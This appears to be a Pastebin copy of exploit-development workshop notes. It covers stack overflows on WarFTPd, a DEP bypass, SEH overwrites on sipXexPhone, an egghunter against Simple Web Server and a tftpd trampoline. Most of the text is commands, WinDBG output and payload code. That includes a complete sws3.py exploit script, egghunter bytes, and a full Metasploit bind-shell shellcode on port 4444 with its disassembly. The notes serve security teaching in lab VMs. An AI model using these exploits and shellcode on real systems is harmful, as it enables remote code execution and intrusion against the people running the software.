API tools faq
paste
Advertisement
iscomsa

Exploit Dev

iscomsa
Mar 28th, 2016
974
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.41 KB | None | 0 0
raw download clone embed print report
  1. You can download the Exploit Dev VMs from the links below:
  2. https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
  3. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
  4. user: Administrator
  5. pass: strategicsec
  6.  
  7. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-ED-MSF.zip
  8. user: strategicsec
  9. pass: strategicsec
  10.  
  11.  
  12.  
  13.  
  14. cd /home/strategicsec/toolz/metasploit
  15. mkdir DLLs
  16. cd DLLs
  17. wget https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/DLLs.zip
  18. unzip DLLs.zip
  19.  
  20. ###########################
  21. # Lab 1a: Stack Overflows #
  22. ###########################
  23.  
  24. #################################
  25. # Start WarFTPd #
  26. # Start WinDBG #
  27. # Press F6 #
  28. # Attach to war-ftpd.exe #
  29. #################################
  30. Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
  31. https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip
  32.  
  33.  
  34.  
  35. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
  36.  
  37.  
  38. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  39.  
  40. At WINDBG prompt
  41. “r” to show registers or “alt+4”
  42.  
  43. dd esp
  44.  
  45.  
  46. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  47.  
  48.  
  49. At WINDBG prompt
  50. “r” to show registers or “alt+4”
  51. dd esp
  52.  
  53. Eip: 32714131
  54. esp: affd58 (71413471)
  55.  
  56. Now we need to SSH into the StrategicSec Ubuntu host
  57.  
  58. cd /home/strategicsec/toolz/metasploit/tools
  59.  
  60. ruby pattern_offset.rb 32714131
  61. 485
  62.  
  63. ruby pattern_offset.rb 71413471
  64. 493
  65.  
  66. Distance to EIP is: 485
  67. Relative position of ESP is: 493
  68.  
  69. RET – POP EIP
  70. RET 4 – POP EIP and shift ESP down by 4 bytes
  71.  
  72. cd /home/strategicsec/toolz/metasploit/
  73. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  74.  
  75. 0x7c9c167d push esp; retn 0x304d
  76. 0x7c9d30d7 jmp esp < - how about we use this one
  77. 0x7c9d30eb jmp esp
  78. 0x7c9d30ff jmp esp
  79.  
  80.  
  81. warftpd3.py with Notepad++
  82. Fill in the appropriate values
  83. Distance to EIP
  84. Address of JMP ESP
  85.  
  86.  
  87.  
  88. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  89.  
  90. 0:003> dd eip
  91. 0:003> dd esp
  92.  
  93.  
  94.  
  95.  
  96.  
  97. Mention bad characters
  98. No debugger
  99.  
  100.  
  101.  
  102. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  103.  
  104. nc XPSP3-ED-Target-IP 4444
  105.  
  106.  
  107.  
  108. ###########################################
  109. # Lab 1b: Stack Overflows with DEP Bypass #
  110. ###########################################
  111.  
  112. Reboot your target host and choose the "2nd" option for DEP.
  113.  
  114.  
  115. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  116.  
  117.  
  118.  
  119. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  120.  
  121. At WINDBG prompt
  122. “r” to show registers or “alt+4”
  123.  
  124. dd esp
  125.  
  126.  
  127.  
  128.  
  129. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  130.  
  131.  
  132. At WINDBG prompt
  133. “r” to show registers or “alt+4”
  134. dd esp
  135.  
  136. Eip: 32714131
  137. esp: affd58 (71413471)
  138.  
  139. Now we need to SSH into the StrategicSec Ubuntu host
  140.  
  141. cd /home/strategicsec/toolz/metasploit/tools
  142.  
  143. ruby pattern_offset.rb 32714131
  144. 485
  145.  
  146. ruby pattern_offset.rb 71413471
  147. 493
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156. cd /home/strategicsec/toolz/metasploit/tools
  157.  
  158. ruby pattern_offset.rb 32714131
  159.  
  160. cd /home/strategicsec/toolz/metasploit/
  161.  
  162. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  163.  
  164.  
  165.  
  166. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  167.  
  168. 0:003> dd eip
  169. 0:003> dd esp
  170.  
  171. INT3s - GOOD!!!!!!!
  172.  
  173.  
  174.  
  175. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  176.  
  177. nc XPSP3-ED-Target-IP 4444
  178.  
  179.  
  180. strategicsec....exploit no workie!!!!
  181.  
  182.  
  183. Why????????? DEP!!!!!!!!!!!!!
  184.  
  185.  
  186.  
  187.  
  188. Let's look through ole32.dll for the following instructions:
  189.  
  190. mov al,0x1
  191. ret 0x4
  192.  
  193. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  194.  
  195.  
  196.  
  197. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  198.  
  199. [DLLs/xpsp3/ole32.dll]
  200. 0x775ee00e b001c204
  201. 0x775ee00e mov al, 1
  202. 0x775ee010 ret 4
  203.  
  204.  
  205. Then we need to jump to the LdrpCheckNXCompatibility routine in
  206. ntdll.dll that disables DEP.
  207.  
  208.  
  209.  
  210. Inside of ntdll.dll we need to find the following instructions:
  211.  
  212. CMP AL,1
  213. PUSH 2
  214. POP ESI
  215. JE ntdll.7
  216.  
  217.  
  218.  
  219. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  220.  
  221. [DLLs/xpsp3/ntdll.dll]
  222. 0x7c91cd24 3c016a025e0f84
  223. 0x7c91cd24 cmp al, 1
  224. 0x7c91cd26 push 2
  225. 0x7c91cd28 pop esi
  226. 0x7c91cd29 jz 7
  227.  
  228.  
  229. This set of instructions makes sure that AL is set to 1, 2 is pushed
  230. on the stack then popped into ESI.
  231.  
  232.  
  233.  
  234.  
  235.  
  236. dep = "\x0e\xe0\x5e\x77"+\
  237. "\xff\xff\xff\xff"+\
  238. "\x24\xcd\x91\x7c"+\
  239. "\xff\xff\xff\xff"+\
  240. "A"*0x54
  241.  
  242.  
  243.  
  244. #################################
  245. # Start WarFTPd #
  246. # Start WinDBG #
  247. # Press F6 #
  248. # Attach to war-ftpd.exe #
  249. # bp 0x775ee00e #
  250. # g #
  251. #################################
  252.  
  253.  
  254.  
  255.  
  256. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  257.  
  258. ---------------------------------------------------------------------------
  259. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  260.  
  261. mov al,0x1
  262. ret 0x4
  263.  
  264.  
  265.  
  266.  
  267. 0:005> g
  268. Breakpoint 0 hit
  269. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  270. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  271. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  272. ole32!CSSMappedStream::IsWriteable:
  273. 775ee00e b001 mov al,1
  274.  
  275.  
  276. 0:001> t
  277. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  278. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  279. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  280. ole32!CSSMappedStream::IsWriteable+0x2:
  281. 775ee010 c20400 ret 4
  282.  
  283.  
  284.  
  285.  
  286.  
  287. ---------------------------------------------------------------------------
  288. Ok, so inside of ntdll.dll we need to find the following instructions:
  289.  
  290. CMP AL,1
  291. PUSH 2
  292. POP ESI
  293. JE ntdll.7
  294.  
  295. 0:001> t
  296. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  297. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  298. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  299. ntdll!LdrpCheckNXCompatibility+0x13:
  300. 7c91cd24 3c01 cmp al,1
  301.  
  302.  
  303. 0:001> t
  304. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  305. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  306. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  307. ntdll!LdrpCheckNXCompatibility+0x15:
  308. 7c91cd26 6a02 push 2
  309.  
  310.  
  311. 0:001> t
  312. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  313. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  314. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  315. ntdll!LdrpCheckNXCompatibility+0x17:
  316. 7c91cd28 5e pop esi
  317.  
  318.  
  319. 0:001> t
  320. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  321. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  322. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  323. ntdll!LdrpCheckNXCompatibility+0x18:
  324. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  325.  
  326.  
  327. ---------------------------------------------------------------------------
  328.  
  329.  
  330.  
  331. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  332.  
  333. nc XPSP3-ED-Target-IP 4444
  334.  
  335.  
  336. ##########################
  337. # Lab 1c: SEH Overwrites #
  338. ##########################
  339.  
  340. #################################################
  341. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  342. # Start sipXexPhone if it isn’t already running #
  343. # Start WinDBG #
  344. # Press “F6” and Attach to sipXexPhone.exe #
  345. # Press “F5” to start the debugger #
  346. #################################################
  347.  
  348.  
  349. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  350.  
  351.  
  352.  
  353. python sipex0.py XPSP3-ED-Target-IP
  354.  
  355. 0:003> !exchain
  356. 0:003> dds esp
  357. 0:003> dds
  358.  
  359. python sipex1.py XPSP3-ED-Target-IP
  360.  
  361. 0:003> !exchain
  362. 0:003> g
  363.  
  364. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  365.  
  366.  
  367. python sipex2.py XPSP3-ED-Target-IP
  368.  
  369. 0:003> !exchain
  370. 0:003> g
  371.  
  372.  
  373. ***ssh into instructor Ubuntu host***
  374. cd /home/strategicsec/toolz/metasploit/tools
  375. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  376.  
  377.  
  378.  
  379. !load narly
  380. !nmod
  381.  
  382. ***ssh into instructor Ubuntu host***
  383. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  384. cd /home/strategicsec/toolz/metasploit/
  385. ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  386.  
  387.  
  388. #########################################
  389. # sipex3.py in Notepad++. #
  390. # Set cseq = 252 #
  391. # Set seh2 address to: 0x10015977 #
  392. #########################################
  393.  
  394.  
  395. python sipex3.py XPSP3-ED-Target-IP
  396. 0:003> !exchain
  397.  
  398. python sipex4.py XPSP3-ED-Target-IP
  399.  
  400.  
  401.  
  402. nc XPSP3-ED-Target-IP 4444
  403.  
  404.  
  405.  
  406.  
  407.  
  408. Brush up on the basics of Structured Exception Handlers:
  409. http://www.securitytube.net/video/1406
  410. http://www.securitytube.net/video/1407
  411. http://www.securitytube.net/video/1408
  412.  
  413.  
  414.  
  415.  
  416. Here are the slides for the exploit dev basics:
  417. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
  418. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
  419. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
  420.  
  421.  
  422. Here are the exploit dev basic videos:
  423. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
  424. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
  425. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
  426. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
  427. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
  428.  
  429.  
  430.  
  431. Recommended videos on Structured Exception Handling:
  432. http://www.securitytube.net/video/1406
  433. http://www.securitytube.net/video/1407
  434. http://www.securitytube.net/video/1408
  435.  
  436.  
  437. ########################################
  438. # Lab 2a: Not Enough Space (Egghunter) #
  439. ########################################
  440.  
  441. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
  442.  
  443. SWS - SIMPLE WEB SERVER
  444. -----------------------
  445.  
  446. Running SWS on Strategicsec-XP-ED-Target-VM
  447. Start > Programs > Simple Web Server (it's in the middle somewhere)
  448. Red icon in system tray
  449. Double click it
  450. - it will pop up a menu
  451. - select "start"
  452. - dialog box shows starting params - port 82
  453.  
  454. WinDBG
  455. - attach to "server.exe"
  456.  
  457.  
  458. python sws1.py | nc XPSP3-ED-Target-IP 82
  459.  
  460.  
  461.  
  462. python sws2.py | nc XPSP3-ED-Target-IP 82
  463.  
  464.  
  465. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  466. cd /home/strategicsec/toolz/metasploit/tools
  467. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  468. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  469.  
  470.  
  471.  
  472.  
  473.  
  474.  
  475.  
  476.  
  477. EGGHUNTER:
  478. ----------
  479.  
  480. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  481. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  482. ^^^^^^^^^^^^^^^^
  483. ABBA
  484. JMP ESP
  485. /
  486. /
  487. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  488. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  489.  
  490.  
  491.  
  492.  
  493. -----sws3.py-----
  494. #!/usr/bin/python2
  495.  
  496. import os # for output setting
  497. import sys
  498. import struct # for pack function
  499.  
  500. # turn off output buffer and set binary mode
  501. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  502.  
  503.  
  504. pad = "A" * 225 # distance to EIP
  505. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  506.  
  507. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  508. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  509.  
  510. shellcode = "\xCC" * 700
  511.  
  512. buf = "GET /"
  513. buf += pad + struct.pack('<I', eip) + egghunter
  514. buf += " HTTP/1.0\r\n"
  515. buf += "User-Agent: ABBAABBA"
  516. buf += shellcode
  517. buf += " HTTP/1.0\r\n"
  518.  
  519. sys.stdout.write(buf)
  520. -----
  521.  
  522. ############################################
  523. # Lab 2b: Not Enough Space (Negative Jump) #
  524. ############################################
  525.  
  526. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  527.  
  528.  
  529. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  530.  
  531. ^
  532. 1 ----------------------1 overflow the buffer---------------------------|
  533.  
  534. ^ ^
  535. |
  536. 2 ----jump over seh record---|
  537.  
  538. ^ ^
  539. |
  540. 3--POP 2 words off stack---|
  541.  
  542. ^
  543. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  544.  
  545.  
  546. #########################################
  547. # Lab 2c: Not Enough Space (Trampoline) #
  548. #########################################
  549.  
  550. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  551. On the Strategicsec-XP-ED-Target-VM VM
  552.  
  553. - open a command prompt
  554. - c:\software\tftpd32
  555. - run tftpd32.exe
  556. - UDP port 69
  557. (socket code is already in the scripts)
  558.  
  559.  
  560.  
  561.  
  562. On your attack host please install:
  563.  
  564.  
  565. NASM - Netwide Assembler
  566.  
  567.  
  568.  
  569.  
  570.  
  571. -----------------------------------------------------------------------------------------------------------------
  572.  
  573.  
  574. We want to generate the shellcode (BIND SHELL on Port 4444)
  575. - No restricted characters
  576. - Encoder: NONE
  577.  
  578. Create a Python file called dumpshellcode.py
  579.  
  580. ---
  581. #!/usr/bin/python2
  582.  
  583. import os
  584. import sys
  585. import struct
  586.  
  587.  
  588. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  589. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  590. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  591. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  592. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  593. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  594. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  595. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  596. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  597. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  598. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  599. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  600. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  601. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  602. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  603. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  604. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  605. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  606. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  607. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  608. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  609.  
  610. sys.stdout.write(shellcode)
  611. ---
  612.  
  613.  
  614.  
  615. python dumpshell.py > bindshell.bin
  616.  
  617. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  618.  
  619.  
  620.  
  621. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  622. 317 bindshell.bin
  623.  
  624. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  625. 00000000 FC cld
  626. 00000001 6AEB push byte -0x15
  627. 00000003 4D dec ebp
  628. 00000004 E8F9FFFFFF call dword 0x2
  629. 00000009 60 pushad
  630. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  631. 0000000E 8B453C mov eax,[ebp+0x3c]
  632. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  633. 00000015 01EF add edi,ebp
  634. 00000017 8B4F18 mov ecx,[edi+0x18]
  635. 0000001A 8B5F20 mov ebx,[edi+0x20]
  636. 0000001D 01EB add ebx,ebp
  637. 0000001F 49 dec ecx
  638. 00000020 8B348B mov esi,[ebx+ecx*4]
  639. 00000023 01EE add esi,ebp
  640. 00000025 31C0 xor eax,eax
  641. 00000027 99 cdq
  642. 00000028 AC lodsb
  643. 00000029 84C0 test al,al
  644. 0000002B 7407 jz 0x34
  645. 0000002D C1CA0D ror edx,0xd
  646. 00000030 01C2 add edx,eax
  647. 00000032 EBF4 jmp short 0x28
  648. 00000034 3B542428 cmp edx,[esp+0x28]
  649. 00000038 75E5 jnz 0x1f
  650. 0000003A 8B5F24 mov ebx,[edi+0x24]
  651. 0000003D 01EB add ebx,ebp
  652. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  653. 00000043 8B5F1C mov ebx,[edi+0x1c]
  654. 00000046 01EB add ebx,ebp
  655. 00000048 032C8B add ebp,[ebx+ecx*4]
  656. 0000004B 896C241C mov [esp+0x1c],ebp
  657. 0000004F 61 popad
  658. 00000050 C3 ret
  659. 00000051 31DB xor ebx,ebx
  660. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  661. 00000057 8B400C mov eax,[eax+0xc]
  662. 0000005A 8B701C mov esi,[eax+0x1c]
  663. 0000005D AD lodsd
  664. 0000005E 8B4008 mov eax,[eax+0x8]
  665. 00000061 5E pop esi
  666. 00000062 688E4E0EEC push dword 0xec0e4e8e
  667. 00000067 50 push eax
  668. 00000068 FFD6 call esi
  669. 0000006A 6653 push bx
  670. 0000006C 66683332 push word 0x3233
  671. 00000070 687773325F push dword 0x5f327377
  672. 00000075 54 push esp
  673. 00000076 FFD0 call eax
  674. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  675. 0000007D 50 push eax
  676. 0000007E FFD6 call esi PART 1
  677. 00000080 5F pop edi
  678. 00000081 89E5 mov ebp,esp
  679. 00000083 6681ED0802 sub bp,0x208
  680. 00000088 55 push ebp
  681. 00000089 6A02 push byte +0x2
  682. 0000008B FFD0 call eax
  683. 0000008D 68D909F5AD push dword 0xadf509d9
  684. 00000092 57 push edi
  685. 00000093 FFD6 call esi
  686. 00000095 53 push ebx
  687. 00000096 53 push ebx
  688. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  689. 00000097 53 push ebx
  690. 00000098 53 push ebx
  691. 00000099 53 push ebx
  692. 0000009A 43 inc ebx
  693. 0000009B 53 push ebx
  694. 0000009C 43 inc ebx
  695. 0000009D 53 push ebx PART 2
  696. 0000009E FFD0 call eax
  697. 000000A0 6668115C push word 0x5c11
  698. 000000A4 6653 push bx
  699. 000000A6 89E1 mov ecx,esp
  700. 000000A8 95 xchg eax,ebp
  701. 000000A9 68A41A70C7 push dword 0xc7701aa4
  702. 000000AE 57 push edi
  703. 000000AF FFD6 call esi
  704. 000000B1 6A10 push byte +0x10
  705. 000000B3 51 push ecx
  706. 000000B4 55 push ebp
  707. 000000B5 FFD0 call eax
  708. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  709. 000000BC 57 push edi
  710. 000000BD FFD6 call esi
  711. 000000BF 53 push ebx
  712. 000000C0 55 push ebp
  713. 000000C1 FFD0 call eax
  714. 000000C3 68E5498649 push dword 0x498649e5
  715. 000000C8 57 push edi
  716. 000000C9 FFD6 call esi
  717. 000000CB 50 push eax
  718. 000000CC 54 push esp
  719. 000000CD 54 push esp
  720. 000000CE 55 push ebp
  721. 000000CF FFD0 call eax
  722. 000000D1 93 xchg eax,ebx
  723. 000000D2 68E779C679 push dword 0x79c679e7
  724. 000000D7 57 push edi
  725. 000000D8 FFD6 call esi
  726. 000000DA 55 push ebp
  727. 000000DB FFD0 call eax
  728. 000000DD 666A64 push word 0x64
  729. 000000E0 6668636D push word 0x6d63
  730. 000000E4 89E5 mov ebp,esp
  731. 000000E6 6A50 push byte +0x50
  732. 000000E8 59 pop ecx
  733. 000000E9 29CC sub esp,ecx
  734. 000000EB 89E7 mov edi,esp
  735. 000000ED 6A44 push byte +0x44
  736. 000000EF 89E2 mov edx,esp
  737. 000000F1 31C0 xor eax,eax
  738. 000000F3 F3AA rep stosb
  739. 000000F5 FE422D inc byte [edx+0x2d]
  740. 000000F8 FE422C inc byte [edx+0x2c]
  741. 000000FB 93 xchg eax,ebx
  742. 000000FC 8D7A38 lea edi,[edx+0x38]
  743. 000000FF AB stosd
  744. 00000100 AB stosd
  745. 00000101 AB stosd
  746. 00000102 6872FEB316 push dword 0x16b3fe72
  747. 00000107 FF7544 push dword [ebp+0x44]
  748. 0000010A FFD6 call esi
  749. 0000010C 5B pop ebx
  750. 0000010D 57 push edi
  751. 0000010E 52 push edx
  752. 0000010F 51 push ecx
  753. 00000110 51 push ecx
  754. 00000111 51 push ecx
  755. 00000112 6A01 push byte +0x1
  756. 00000114 51 push ecx
  757. 00000115 51 push ecx
  758. 00000116 55 push ebp
  759. 00000117 51 push ecx
  760. 00000118 FFD0 call eax
  761. 0000011A 68ADD905CE push dword 0xce05d9ad
  762. 0000011F 53 push ebx
  763. 00000120 FFD6 call esi
  764. 00000122 6AFF push byte -0x1
  765. 00000124 FF37 push dword [edi]
  766. 00000126 FFD0 call eax
  767. 00000128 8B57FC mov edx,[edi-0x4]
  768. 0000012B 83C464 add esp,byte +0x64
  769. 0000012E FFD6 call esi
  770. 00000130 52 push edx
  771. 00000131 FFD0 call eax
  772. 00000133 68F08A045F push dword 0x5f048af0
  773. 00000138 53 push ebx
  774. 00000139 FFD6 call esi
  775. 0000013B FFD0 call eax
  776.  
  777.  
  778.  
  779.  
  780. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  781. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  782. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  783. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  784. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  785. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  786. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  787. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  788. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  789. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  790.  
  791.  
  792. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  793. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  794. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  795. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  796. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  797. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  798. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  799. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  800. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  801. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  802. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  803.  
  804.  
  805. STACK SHIFTER:
  806. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  807. prepend += "\x44" # inc esp
  808.  
  809.  
  810.  
  811.  
  812.  
  813.  
  814.  
  815.  
  816.  
  817.  
  818.  
  819.  
  820.  
  821.  
  822. ---- final script ----
  823.  
